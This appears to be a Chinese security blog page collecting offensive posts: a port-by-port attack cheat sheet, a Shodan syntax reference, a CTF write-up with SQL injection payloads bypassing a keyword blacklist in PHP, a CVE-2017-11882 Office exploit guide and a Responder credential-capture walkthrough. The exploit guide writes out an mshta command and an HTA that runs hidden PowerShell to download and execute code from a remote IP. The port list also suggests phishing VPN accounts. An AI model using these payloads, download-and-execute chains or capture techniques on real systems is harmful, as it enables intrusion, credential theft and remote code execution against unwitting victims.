分类 默认分类 下的文章

端口漏洞整理

21 FTP弱密码
22 SSH弱密码
23 telnet弱密码
25 邮件伪造,vrfy/expn查询邮件用户信息,可使用smtp-user-enum工具来自动跑
53 DNS溢出、远程代码执行、允许区域传送,dns劫持,缓存投毒,欺骗以及各种基于dns隧道的远控
69 尝试下载目标及其的各类重要配置文件
80 IIS6 RCE
80-89 应用服务器端口
110 POP3 可尝试爆破,嗅探
111 NFS 权限配置不当
137 SMB
143 IMAP 爆破
161 SNMP 爆破默认团队字符串,搜集目标内网信息
139 smb、嗅探
161 snmp默认团体名/弱口令漏洞
389 LDAP注入、匿名访问、弱口令
443 poodle漏洞、应用服务器端口
445 ms17-010、ms08-067
464 kpasswd Kerberos 口令和钥匙改换服务
512,513,514 Linux rexec 可爆破,rlogin登陆
554 RTSP
873 rsync

1080 ss 可以尝试使用ss代理工具进行代理

1194 OpenVPN 想办法钓VPN账号,进内网
1352 Lotus 弱口令,信息泄漏,爆破
1433 mssql(sql server) 注入,提权,sa弱口令,爆破
1500 ISPmanager 弱口令
1521 Oracle tns爆破,注入,弹shell…
1723 PPTP 爆破,想办法钓VPN账号,进内网
2082,2083 cPanel 弱口令
2049 NFS 权限配置不当
2181 Zookeeper
2375 docker
2601,2604 Zebra 默认密码zerbra
3000 grafan
3128 Squid 弱口令
3306 mysql弱密码
3312,3311 kangle 弱口令
3389 ms12-020、Windows rdp shift后门[需要03以下的系统]、爆破
3690 svn泄露,未授权访问
4848 GlassFish 弱口令
4899 radmin
5000 Flask、Sybase/DB2 爆破,注入
5432 postgresql 爆破,注入,弱口令
5900,5901,5902 VNC 弱口令爆破 VNC提权
5984 couchdb
5985 SOAP
6379 redis未授权访问
6443 Kubernetes
7001 weblogic、websphere
7002 WebLogic Java反序列化,弱口令
7778 Kloxo 主机面板登录
8000 Ajenti 弱口令
8069 Zabbix 远程执行,SQL注入
8080 jenkins、GeoServer、Kubernetes、JBOSS、libssh、poodle

8180 libssh - cve-2018-10933、JBOSS

8393、8983、8081、80、443、8080 solr
8443 Plesk 弱口令
8440-8450,8080-8089 应用服务器端口(可尝试经典的topn,vpn,owa,webmail,目标oa,各类Java控制台,各类服务器Web管理面板,各类Web中间件漏 洞利用,各类Web框架漏洞利用等等……)
8161 ActiveMQ后台弱密码(admin/admin)漏洞以及put写shell

9080-9081,9090 WebSphere(应用服务器) Java反序列化/弱口令

9043 、9443 poodle
9200,9300 Elasticsearch未授权访问漏洞、elasticsearch远程命令执行、Elasticsearch任意文件读取
11211 memcache
27017,27018 mongodb
43958 Serv-U
50070,50030 hadoop
61616 ActiveMQ

80,443,22,21,25,2500,993,994,995,465,587,110,143,8080,47001,8081,81,8443,8088,8000,8888,8082,8090,88,8001,82,8008,9001,9000,8089,9080,8085,8086,8181,8139,8084,8889,8021,9002,8083,9999,9443,84,1755,7443,5985,8091,18100,10000,7001,8009,8002,83,7002,9090,6060,8022,6443,10001,7009,7003,6001,8003,8800,7081,7070,7005,8087,7082,8025,7004,40029,5000,5443,86,8026,7020,7010,7012,7006,7083,7018,10080,7015,7021,7019,8020,7026,7014,800,7024,7025,7013,7097,7011,7016,7000,7022,7023,808,9012,9663,3333,7088,9081,8663,7777,8553,4443,12601,6666,9553,89,8999,5222,48800,9023,9021,9211,9200,9208,9210,9207,9209,9213,22345,9212,9037,9205,9027,9201,9082,2222,85,90,1000,8686,18080,8100,8101,2083,8880,22222,9003,2096,8005,6000,7485,28080,843,7080,2087,8006,2013,18800,8134,87,8099,8060,97,2082,8077,48002,2095,2086,30000,1935,3211,8078,8106,9898,48003,2223,8070,7800,770,7510,55888,775,779,801,2053,2052,9929,1820,9919,33702,9918,9908,9916,9928,9939,8334,18801,91,18803,18980,776,8092,8336,3939,3601,15001,1090,9180,30001,2091,666,6520,58080,5357,15002,2888,3000,3501,7388,9332,8011,6510,1119,3080,554,6320,5186,20000,1,3,4,6,7,9,13,17,19,20,23,24,26,30,32,33,37,42,43,49,53,70,79,99,100,106,109,111,113,119,125,135,139,144,146,161,163,179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,444,445,458,464,481,497,500,512,513,514,515,524,541,543,544,545,548,555,563,593,616,617,625,631,636,646,648,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,873,880,888,898,900,901,902,903,911,912,981,987,990,992,999,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070,1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,1106,1107,1108,1110,1111,1112,1113,1114,1117,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328,1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,2161,2170,2179,2190,2191,2196,2200,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399,2401,2492,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,2701,2702,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3001,3003,3005,3006,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3323,3324,3325,3351,3367,3369,3370,3371,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689,3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003,4004,4005,4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4444,4445,4446,4449,4550,4567,4662,4848,4899,4900,4998,5001,5002,5003,5004,5009,5030,5033,5050,5051,5054,5060,5061,5080,5087,5100,5101,5102,5120,5190,5200,5214,5221,5225,5226,5269,5280,5298,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678,5679,5718,5730,5800,5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5906,5907,5910,5911,5915,5922,5925,5950,5952,5959,5960,5961,5962,5963,5987,5988,5989,5998,5999,6002,6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6389,6502,6543,6547,6565,6566,6567,6580,6646,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7007,7100,7103,7106,7200,7201,7402,7435,7496,7512,7625,7627,7676,7741,7778,7911,7920,7921,7937,7938,7999,8007,8010,8031,8042,8045,8093,8180,8192,8193,8194,8200,8222,8254,8290,8291,8292,8300,8333,8383,8400,8402,8500,8600,8649,8651,8652,8654,8701,8873,8899,8994,9009,9010,9011,9040,9050,9071,9091,9099,9100,9101,9102,9103,9110,9111,9220,9290,9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595,9618,9666,9876,9877,9878,9900,9917,9943,9944,9968,9998,10002,10003,10004,10009,10010,10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238,14441,14442,15000,15003,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27352,27353,27355,27356,27715,28201,30718,30951,31038,31337,32768,32769,32770,32771,32772,32773,32774,32775,32776,32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292,40193,40911,41511,42510,44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157,49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002,50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389

shodan相关语法

附录A:Banner格式
常用属性
名称 描述 举例
asn 自治系统号 AS4837
data 服务的主要banner HTTP/1.1 200…
ip 整数型的IP地址格式 493427495
ip_str 字符串型IP 199.30.15.20
ipv6 字符串型IPv6 2001:4860:4860::8888
port 服务的端口号 80
timestamp 收集信息的日期 2014-01-15T05:49:56.283713
hash 数据属性的散列值 Numeric hash of the data property
hostnames 目标IP的主机名 [“shodan.io”, “www.shodan.io”]
domains 目标IP的所有域名 [“shodan.io”]
link 网络连接类型 以太网/调制解调器
location 设备的物理地址 见下文
opts 补充或者实验数据不包含在主要的banner中
org 分配IP的组织 Google Inc.
isp 负责IP空间的ISP Verizon Wireless
os 操作系统 Linux
uptime IP上线时间 50
tags 描述设备用途的标签列表(仅供企业型账号使用) ["ics", "vpn"]
transport 用于收集banner的传输协议(UDP或者是TCP) tcp
Elastic属性
下列属性是为 Elastic (曾经的 ElasticSearch)收集的:
名称 描述
elastic.cluster 有关集群的一般信息
elastic.indices 集群上可用的索引列表
elastic.nodes 群集的节点/对等点列表及其信息
HTTP(S)属性
Shodan遵循HTTP响应的重定向,并将所有中间数据存储在banner中。抓取工具不遵循重定向的情况是HTTP请求被重定向到HTTPS位置,反之亦然:
名称 描述
http.components 用于创建网站的网络技术
http.host 发送主机名来抓取网站的HTML
http.html 网站的HTML内容
http.html_hash http.html属性的数字散列
http.location 最终的HTML响应的位置
http.redirects 遵循的重定向列表。每个重定向项目有3个属性:主机,数据和位置
http.robots robots.txt文件的网站
http.server HTTP响应的服务器头
http.sitemap 网站的Sitemap XML
http.title 网站的标题
位置属性
名称 描述
area_code 设备位置的区号
city 城市名称
country_code 2个字母组成的国家代码
country_code3 3个字母组成的国家代码
country_name 国家的全名
dma_code 指定市场区号(仅限美国)
latitude 纬度
longitude 经度
postal_code 邮政编码
region_code 地区代码
SMB属性
名称 描述
smb.anonymous 服务是否允许匿名连接(true/false)
smb.capabilities 服务支持的功能列表
smb.shares 可用的网络共享列表
smb.smb_version 用于收集信息的协议版本
smb.software 提供服务的软件
smb.raw 服务器发送的十六进制编码数据包列表; 如果想做SMB解析,这很有用
SSH属性
名称 描述
ssh.cipher 协商期间使用的密码
ssh.fingerprint 设备的指纹
ssh.kex 服务器支持的密钥交换算法列表
ssh.key 服务器的SSH密钥
ssh.mac 消息认证码算法
SSL 属性
**如果服务使用SSL进行包装,则Shodan将执行附加测试,并在以下属性中提供结果:
名称 描述**
ssl.acceptable_cas 服务器接受的证书颁发机构列表
ssl.cert 可解析的SSL证书
ssl.cipher SSL连接的首选密码
ssl.chain 从用户证书到根证书的SSL证书列表
ssl.dhparams Diffie-Hellman参数
ssl.tlsext 服务器支持的TLS扩展列表
ssl.versions 支持的SSL版本; 如果该值用-开头,则该服务不支持该版本(例如:“-SSLv2”是指不支持SSLv2的服务)
ISAKMP属性
以下为使用ISAKMP协议的VPN(例如IKE)收集的属性:
名称 描述
isakmp.initiator_spi 初始化器的hex编码的安全参数索引
isakmp.responder_spi 用于响应器的hex编码的安全参数索引
isakmp.next_payload 启动后发送的下一个载荷
isakmp.version 协议版本; 例如“1.0”
isakmp.exchange_type 交换类型
isakmp.flags.encryption 加密设置:true或false
isakmp.flags.commit 提交设置:true或false
isakmp.flags.authentication 认证设置:true或false
isakmp.msg_id 消息的十六进制编码标识
isakmp.length ISAKMP数据包的大小
特殊属性
_shodan
_shodan属性包含有关数据如何被Shodan收集的信息。它与其他属性不同,因为它不提供有关设备的信息。相反,它会告诉你Shodan使用哪一个banner抓取器来与目标IP交互。这对于探知服务器上的端口运行服务情况是很重要的。例如,80端口是最知名的Web服务端口,但它也被各种恶意软件用来规避防火墙规则,_shodan属性将让你知道是该端口否用HTTP模块来收集数据或是否使用了反恶意软件模块。
名称 描述
_shodan.crawler 识别Shodan爬取工具的唯一ID
_shodan.id 此banner的唯一ID
_shodan.module 爬虫抓取banner而使用SHodan模块的名称
_shodan.options 数据收集期间使用的配置选项
_shodan.hostname 发送Web请求时使用的主机名
_shodan.options.referrer 为某端口/服务触发扫描的banner的惟一ID
附录B:搜索语法关键词列表
常用语法
过滤器名 描述 类型 举例
after 只显示给出日期之后的结果(dd/mm/yyyy) string after:"04/02/2017"
asn 自治系统号码 string asn:"AS4130"
before 只显示给出日期之前的结果(dd/mm/yyyy) string before:"04/02/2017"
category 现有的分类:ics,malware string category:"malware"
city 城市的名字 string city:"San Diego"
country 国家简写 string country:"ES" country:"CN"
geo 经纬度 string geo:"46.9481,7.4474"
hash 数据的hash值 int -hash:0
has_ipv6 是否是IPv6 boolean has_ipv6:true
has_screenshot 是否有截图 boolean has_screenshot:true
hostname 主机名或域名 string hostname:"google"
ip ip地址 string ip:"54.67.82.248 "
isp ISP供应商 string isp:"China Telecom"
org 组织或公司 string org:"google"
os 操作系统 string os:"Windows 7 or 8"
port 端口号 int port:21
postal 邮政编码(仅限于美国) string postal:"98221"
product 软件、平台 string product:"Apache httpd" product:"openssh"
region 地区或国家别名 string -
state string -
net CIDR格式的IP地址 string net:190.30.40.0/24
version 软件版本 string version:"2.6.1"
vuln 漏洞的CVE ID string vuln:CVE-2014-0723
HTTP过滤器
名称 描述 类型
http.component 网站上所使用的网络技术名称 string
http.component_category 网站上使用的网络组件的类别 string
http.html Web banner string
http.html_hash 网站HTML的哈希值 int
http.status 响应状态码 int
http.title 网站title得banner string
NTP 过滤器
名称 描述 类型
ntp.ip 查找在其monlist中NTP服务器的IP
ntp.ip_count 初始monlist返回的IP数量 int
ntp.more 真/假; monlist集是否有更多的IP地址 boolean
ntp.port monlist中的IP地址使用的端口 int
SSL过滤器
名称 描述 类型
has_ssl 有无SSL boolean
SSL 搜索所有SSL的数据 string
ssl.alpn 诸如HTTP/2的应用层协议 string
ssl.chain_count 链中的证书数量 int
ssl.version 可能的值:SSLv2,SSLv3,TLSv1,TLSv1.1,TLSv1.2 string
ssl.cert.alg 证书算法 string
ssl.cert.expired 是否是过期证书 boolean
ssl.cert.extension 证书中的扩展名 string
ssl.cert.serial 序列号为整数或十六进制字符串 int/string
ssl.cert.pubkey.bits 公钥的位数 int
ssl.cert.pubkey.type 公钥类型 string
ssl.cipher.version SSL版本的首选密码 string
ssl.cipher.bits 首选密码中的位数 int
ssl.cipher.name 首选密码的名称 string
Telnet 过滤器
名称 描述 类型
telnet.option 搜索所有选项 string
telnet.do 对方执行的请求或期望对方执行指示的选项 string
telnet.dont 对方停止执行的请求或不再期望对方执行指定的选项 string
telnet.will 确认现在正在执行指定的选项 string
telnet.wont 表示拒绝执行或继续执行指定的选项 string
附录C:Facets搜索
常用Facets
名称 描述
asn 自治系统号码
city 城市的全名
country 国家的全名
domain 设备的域名
has_screenshot 有无可用的截图
isp ISP管理网络块
link 网络连接的类型
org 拥有该网块的组织
os 操作系统
port 服务的端口号
postal 邮政编码
product 软件/产品的名称
region 地区/国家的名称
state 区域的别名
uptime 主机启动的时间(以秒为单位计算)
vuln 漏洞的CVE ID
HTTP Facets
名称 描述 类型
http.component 网站上使用的网络技术的名称 string
http.component_category 网站上使用的网络组件的类别 string
http.html_hash HTML网站的哈希值 int
http.status 响应状态码 int
NTP Facets
名称 描述
ntp.ip monlist返回的IP地址
ntp.ip_count 初始monlist返回的IP数量
ntp.more 真假; monlist收集的是否有更多的IP地址
ntp.port monlist中的IP地址使用的端口
**SSH Facets
名称 描述**
ssh.cipher 密码的名称
ssh.fingerprint 设备的指纹
ssh.mac 使用的MAC算法名称(例如:hmac-sha1)
ssh.type 认证密钥的类型(例如:ssh-rsa)
SSL Facets
名称 描述
ssl.version 支持SSL版本
ssl.alpn 应用层协议
ssl.chain_count 链中的证书数量
ssl.cert.alg 证书算法
ssl.cert.expired 真假; 证书过期与否
ssl.cert.serial 证书序列号为整数
ssl.cert.extension 证书扩展名
ssl.cert.pubkey.bits 公钥的位数
ssl.cert.pubkey 公钥类型的名称
ssl.cipher.bits 首选密码中的位数
ssl.cipher.name 首选密码的名称
ssl.cipher.version SSL版本的首选密码
Telnet Facets
名称 描述 类型
telnet.option 显示所有选项 string
telnet.do 对方执行的请求或期望对方执行指示的选项 string
telnet.dont 对方停止执行的请求或不再期望对方执行指定的选项 string
telnet.will 服务器支持指定的选项 string
telnet.wont 服务器不支持指定的选项 string
附录D:端口列表
Port Service
7 Echo
11 Systat
13 Daytime
15 Netstat
17 Quote of the day
19 Character generator
21 FTP
22 SSH
23 Telnet
25 SMTP
26 SSH
37 rdate
49 TACACS+
53 DNS
67 DHCP
69 TFTP, BitTorrent
70 Gopher
79 Finger
80 HTTP, malware
81 HTTP, malware
82 HTTP, malware
83 HTTP
84 HTTP
88 Kerberos
102 Siemens S7
104 DICOM
110 POP3
111 Portmapper
113 identd
119 NNTP
123 NTP
129 Password generator protocol
137 NetBIOS
143 IMAP
161 SNMP
175 IBM Network Job Entry
179 BGP
195 TA14-353a
311 OS X Server Manager
389 LDAP
389 CLDAP
443 HTTPS
443 QUIC
444 TA14-353a, Dell SonicWALL
445 SMB
465 SMTPS
500 IKE (VPN)
502 Modbus
503 Modbus
515 Line Printer Daemon
520 RIP
523 IBM DB2
554 RTSP
587 SMTP mail submission
623 IPMI
626 OS X serialnumbered
636 LDAPS
666 Telnet
771 Realport
789 Redlion Crimson3
873 rsync
902 VMWare authentication
992 Telnet (secure)
993 IMAP with SSL
995 POP3 with SSL
1010 malware
1023 Telnet
1025 Kamstrup
1099 Java RMI
1177 malware
1200 Codesys
1234 udpxy
1400 Sonos
1434 MS-SQL monitor
1515 malware
1521 Oracle TNS
1604 Citrix, malware
1723 PPTP
1741 CiscoWorks
1833 MQTT
1900 UPnP
1911 Niagara Fox
1962 PCworx
1991 malware
2000 iKettle, MikroTik bandwidth test
2081 Smarter Coffee
2082 cPanel
2083 cPanel
2086 WHM
2087 WHM
2123 GTPv1
2152 GTPv1
2181 Apache Zookeeper
2222 SSH, PLC5, EtherNet/IP
2323 Telnet
2332 Sierra wireless (Telnet)
2375 Docker
2376 Docker
2379 etcd
2404 IEC-104
2455 CoDeSys
2480 OrientDB
2628 Dictionary
3000 ntop
3260 iSCSI
3306 MySQL
3310 ClamAV
3386 GTPv1
3388 RDP
3389 RDP
3460 malware
3541 PBX GUI
3542 PBX GUI
3689 DACP
3702 Onvif
3780 Metasploit
3787 Ventrilo
4000 malware
4022 udpxy
4040 Deprecated Chef web interface
4063 ZeroC Glacier2
4064 ZeroC Glacier2 with SSL
4070 HID VertX/ Edge door controller
4157 DarkTrack RAT
4369 EPMD
4443 Symantec Data Center Security
4444 malware
4500 IKE NAT-T (VPN)
4567 Modem web interface
4664 Qasar
4730 Gearman
4782 Qasar
4800 Moxa Nport
4840 OPC UA
4911 Niagara Fox with SSL
4949 Munin
5006 MELSEC-Q
5007 MELSEC-Q
5008 NetMobility
5009 Apple Airport Administration
5060 SIP
5094 HART-IP
5222 XMPP
5269 XMPP Server-to-Server
5353 mDNS
5357 Microsoft-HTTPAPI/2.0
5432 PostgreSQL
5577 Flux LED
5601 Kibana
5632 PCAnywhere
5672 RabbitMQ
5900 VNC
5901 VNC
5938 TeamViewer
5984 CouchDB
6000 X11
6001 X11
6379 Redis
6666 Voldemort database, malware
6667 IRC
6881 BitTorrent DHT
6969 TFTP, BitTorrent
7218 Sierra wireless (Telnet)
7474 Neo4j database
7548 CWMP (HTTPS)
7777 Oracle
7779 Dell Service Tag API
8008 Chromecast
8009 Vizio HTTPS
8010 Intelbras DVR
8060 Roku web interface
8069 OpenERP
8087 Riak
8090 Insteon HUB
8099 Yahoo SmartTV
8112 Deluge (HTTP)
8126 StatsD
8139 Puppet agent
8140 Puppet master
8181 GlassFish Server (HTTPS)
8333 Bitcoin
8334 Bitcoin node dashboard (HTTP)
8443 HTTPS
8554 RTSP
8800 HTTP
8880 Websphere SOAP
8888 HTTP, Andromouse
8889 SmartThings Remote Access
9000 Vizio HTTPS
9001 Tor OR
9002 Tor OR
9009 Julia
9042 Cassandra CQL
9051 Tor Control
9100 Printer Job Language
9151 Tor Control
9160 Apache Cassandra
9191 Sierra wireless (HTTP)
9418 Git
9443 Sierra wireless (HTTPS)
9595 LANDesk Management Agent
9600 OMRON
9633 DarkTrack RAT
9869 OpenNebula
10001 Automated Tank Gauge
10001 Ubiquiti
10243 Microsoft-HTTPAPI/2.0
10554 RTSP
11211 Memcache
12345 malware
17000 Bose SoundTouch
17185 VxWorks WDBRPC
12345 Sierra wireless (Telnet)
11300 Beanstalk
13579 Media player classic web interface
14147 Filezilla FTP
16010 Apache Hbase
16992 Intel AMT
16993 Intel AMT
18245 General Electric SRTP
20000 DNP3
20547 ProconOS
21025 Starbound
21379 Matrikon OPC
23023 Telnet
23424 Serviio
25105 Insteon Hub
25565 Minecraft
27015 Steam A2S server query, Steam RCon
27016 Steam A2S server query
27017 MongoDB
28015 Steam A2S server query
28017 MongoDB (HTTP)
30313 Gardasoft Lighting
30718 Lantronix Setup
32400 Plex
37777 Dahuva DVR
44818 EtherNet/IP
47808 Bacnet
49152 Supermicro (HTTP)
49153 WeMo Link
50070 HDFS Namenode
51106 Deluge (HTTP)
53413 Netis backdoor
54138 Toshiba PoS
55443 McAfee
55553 Metasploit
55554 Metasploit
62078 Apple iDevice
64738 Mumble
我只复制了一部分,大家可以参考shodan使用手册

in_array()当第三个参数为false导致的一些安全问题

今天12月24日你们是不是在外面HAPPY,狂欢?

可怜的我只有在家看看代码狂欢哈。

首先介绍下in_array()
in_array :(PHP 4, PHP 5, PHP 7)
检查数组中是否存在某个值
bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] )
检查$needle 是否在$haystack中 当$stric=FALSE时 为弱比较.
比如

<?php
$rate =$_POST['rate'];
$conf['$rate_items'] = array(0,1,2,3,4,5,6,7);
if(!isset($rate) or !$conf['rate'] or !in_array($rate,$conf['rate_items']))
{
    return false;
}
$query='INSERT INTO'.RATE_TABLE.'(user_id,anonymous_id,element_id,rate,date) VALUES ('.$user['id'].','.'\''.$anonymous_id.'\','.$image_id.','.$rate.',NOW());';
pwg_query($query);
?>

当in_array()的第三个参数为缺省值的时候默认为FALSE会把1 and 因为是弱转换所以会把1 and转换为1,所以能绕过一些逻辑.
比如上面的代码就可以直接然后if的逻辑直接进入下面的insert into 重而导致注入

INSERT INTO piwigo_rate (user_id,anonymous_id,element_id,rate,date) VALUES (2,'192.168.2',1,1,1 and if(ascii(substr((select database()),1,1))=112,1,sleep(3)));#,NOW()) ;

下面看看一道题目吧 来自红日安全有2个文件 分别为index.php和config.php

//index.php
<?php
include 'config.php';
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
    die("连接失败: ");
}

$sql = "SELECT COUNT(*) FROM users";
$whitelist = array();
$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    $whitelist = range(1, $row['COUNT(*)']);
}

$id = stop_hack($_GET['id']);
$sql = "SELECT * FROM users WHERE id=$id";

if (!in_array($id, $whitelist)) {
    die("id $id is not in whitelist.");
}

$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    echo "<center><table border='1'>";
    foreach ($row as $key => $value) {
        echo "<tr><td><center>$key</center></td><br>";
        echo "<td><center>$value</center></td></tr><br>";
    }
    echo "</table></center>";
}
else{
    die($conn->error);
}

?>
//config.php

    <?php  
    $servername = "localhost";
    $username = "root";
    $password = "123456";
    $dbname = "day1";
    
    function stop_hack($value){
        $pattern = "insert|delete|or|concat|concat_ws|group_concat|join|floor|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval";
        $back_list = explode("|",$pattern);
        foreach($back_list as $hack){
            if(preg_match("/$hack/i", $value))
                die("$hack detected!");
        }
        return $value;
    }
    ?>
    //sql语句
    # 搭建CTF环境使用的sql语句
    create database day1;
    use day1;
    create table users (
    id int(6) unsigned auto_increment primary key,
    name varchar(20) not null,
    email varchar(30) not null,
    salary int(8) unsigned not null );
    
    INSERT INTO users VALUES(1,'Lucia','[email protected]',3000);
    INSERT INTO users VALUES(2,'Danny','[email protected]',4500);
    INSERT INTO users VALUES(3,'Alina','[email protected]',2700);
    INSERT INTO users VALUES(4,'Jameson','[email protected]',10000);
    INSERT INTO users VALUES(5,'Allie','[email protected]',6000);
    
    create table flag(flag varchar(30) not null);
    INSERT INTO flag VALUES('HRCTF{1n0rrY_i3_Vu1n3rab13}');

我们来看看index.php吧

//index.php
<?php
include 'config.php';
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
    die("连接失败: ");
}

$sql = "SELECT COUNT(*) FROM users";
$whitelist = array();
$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    $whitelist = range(1, $row['COUNT(*)']);//生成一个1到返回查询数的随机数。我们就取1吧,这步满足后就到下面了
}

$id = stop_hack($_GET['id']);//就到这里,这里有个过滤函数
//insert|delete|or|concat|concat_ws|group_concat|join|floor|\/\*|\*|\.\.\/|\.\/|
//union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval 然后执行下面的语句
$sql = "SELECT * FROM users WHERE id=$id";

if (!in_array($id, $whitelist)) {
    die("id $id is not in whitelist.");//前面知识已经对in_array函数介绍过了,第三个参数为假的就是弱比较.
}

$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    echo "<center><table border='1'>";
    foreach ($row as $key => $value) {
        echo "<tr><td><center>$key</center></td><br>";
        echo "<td><center>$value</center></td></tr><br>";
    }
    echo "</table></center>";
}
else{
    die($conn->error);
}

?>

现在说白了 只要绕过WAF就OK,一看当时就傻眼了,这个过滤得太厉害了吧.基本都过滤完了,还好有3个关键字可以用 select,updatexml,and.能用
and 1=(updatexml(1,concat(0x3a,(select user())),1)) 常规得语句
但是里面得concat被过滤了
我们可以使用make_set()函数来代替
and (select updatexml(1,make_set(15,'~',(select flag from flag)),1))

make_set()语句有两个参数 第一个为bits 最后会转换为2进制然后在倒叙.第二个参数为需要显示得str.
上面得意思就是15 的二进制为1 1 1 1 所以就是显示全部。
然后通过updatexml报错爆出来
当然我们上面只有2个字符串需要显示出来的 分别为 ~ 和 select flag from flag 所以只要 4位的二进制 前2位为1都可以报错成功的
所以分别为 0 1 1 1 ->7 0 0 1 1->3

微信截图_20191224204817.png

微信截图_20191224205022.png

微信截图_20191224205035.png

最后祝大家圣诞节快乐 by Eas0n

CVE-2017-11882 通杀所有office版本

影响版本:
office 2003
office 2007
office 2010
office 2013
office 2016
我只测试了2007下面开始干
github地址:https://github.com/Ridter/CVE-2017-11882/
下载以后就去生成test.doc哈
python Command43b_CVE-2017-11882.py -c "mshta http://3as0n.cn:8000/abc" -o test.doc
然后在vps上去新建一个文件,名字就是abc吧,里面的内容为下面这个

<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c powershell.exe -nop -w hidden -c 'IEX ((new-object net.webclient).downloadstring("http://139.155.2.101:6677/a"))'"
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
然后把生成的文件放我们的靶机里面试试下效果哈

33.jpg

内网渗透之WPAD劫持SMB

一款名为Responder.py的工具能够获取最初的用户凭证.Responder是实现监听LLMNR(本地链路多播名称解析,Link Local Multicast Name Resolition)协议 和 NBT-NS(网络基本输入输出协议域名服务,NetBIOS ove TCP/IP Name Service) 协议工具之一
Responder 还利用了另外一个漏洞-WPAD(网站代理自动发现协议,WEB Proxy AutoDiscovery protocol)漏洞 漏洞编号MS12-074
基本的工作原理是当浏览器设置位自动检查配置(如下图),受害者主机将试图从网络桑获取配置文件
1.jpg

接着去https://github.com/SpiderLabs/Responder下载到kaili 里面.
然后使用下面得命令
./Responder.py -I eth0 -wv
2.jpg

然后我们在我们得windows2008R2的靶机去访问一个网站(这个网站必须要不存在的才能重定向到我们这边来).
3.jpg

然后我们kailinux 这边的结果是这样的
4.jpg

接着我们把结果扔到john里面去跑 日志的路径是 /usr/share/responder/logs#
5.jpg

我这个密码就不跑了难得跑。密码跑出来后我们就去配合msf 里面的 expolit/windows/smb来使用得到shell
6.jpg

然后设置PAYLOAD
最后就直接打
8.jpg

preView